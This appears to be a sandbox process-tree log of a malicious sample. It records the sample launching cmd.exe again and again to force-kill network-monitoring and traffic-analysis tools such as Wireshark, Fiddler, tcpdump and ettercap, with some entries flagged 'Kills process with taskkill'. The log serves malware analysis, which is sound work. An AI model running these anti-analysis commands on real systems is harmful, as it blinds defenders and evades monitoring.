
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:4868

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:2508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:4124

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:240

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:3708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5292

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:3644

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:5320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5080

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:1368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:5732

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:5760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:5332

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:5828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:4160

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:5652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:4364

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:5548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:3076

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5844

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:6016

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
- Kills process with taskkill
PID:2464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:460

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:5820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:2628

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:2664

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:5296

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:6128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:5884

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:648

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:3572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:1984

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:2696

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:3968

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:5592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:3512

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
- Kills process with taskkill
PID:1032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:2184

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:1436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:4548

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:5228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:2236

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:1832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:5984

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:132

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:2752

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:3564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:1608

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:1844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:5004

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:4264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:5932

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:5496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:2324

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:3416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:5716

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:2732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:1872

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:4696

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:2588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:5340

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:5408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5916

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:1500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:1220

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:5140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:5344

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:5976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:5648

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:5196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:5484

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:3376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:3328

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:896

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:1060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:984

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:2456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:2412

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:5028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:4904

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:4852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:1544

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:3936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:5644

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:2788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:464

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:6048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:784

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:1984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5620

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:2696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:2396

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:2828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:4088

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:2840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:3268

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:1760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:4336

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:2432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:8

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:4580

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:1312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:5072

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:4684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:1108

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:5680

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:2752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:3008

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:6032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:5912

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:4428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:4984

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:3048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:3972

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:2520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:3708

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:4104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:412

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:1020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:3412

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:2604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:4320

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:1824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:200

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:3944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:5828

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:2364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:6060

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
- Kills process with taskkill
PID:5156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:5548

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:1440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:5144

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:2284

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:3896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:1708

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:5820

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:3472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5568

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:1640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:892

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:4532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:2056

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:4640

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:2784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:2956

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:5200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:4488

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:2728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:3940

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:6020

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:3020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:1672

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:1516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:1364

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:4244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:1028

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:2808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:2448

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:3284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:2172

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:4056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:424

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:1900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5056

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:3700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:1192

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:5276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:2516

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:6040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:336

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:3524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:1916

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:5492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:4032

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:4124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:4376

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:1396

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:3044

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:2952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:2360

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:4052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5468

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:5732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:2152

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:5272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:2992

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:5812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:5412

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:1680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:5824

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:4780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:2108

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:4248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:4796

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:3024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:2164

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:6112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5656

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:3556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:4592

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:2536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:3692

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:5060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:5740

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:5520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:3276

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:3684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:3748

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5372

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:4528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:2896

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:5608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:3820

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:4556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:1224

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:5704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:4844

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:2984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:2720

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:4252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:6084

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:2168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:5000

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:4560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:1908

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:4432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:420

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:3816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:1340

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:5284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:4196

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:6100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:2176

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:3048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:3244

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:2520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:4544

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:4104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:1996

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:1020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:248

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:3644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:4480

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:1824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5436

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:3944

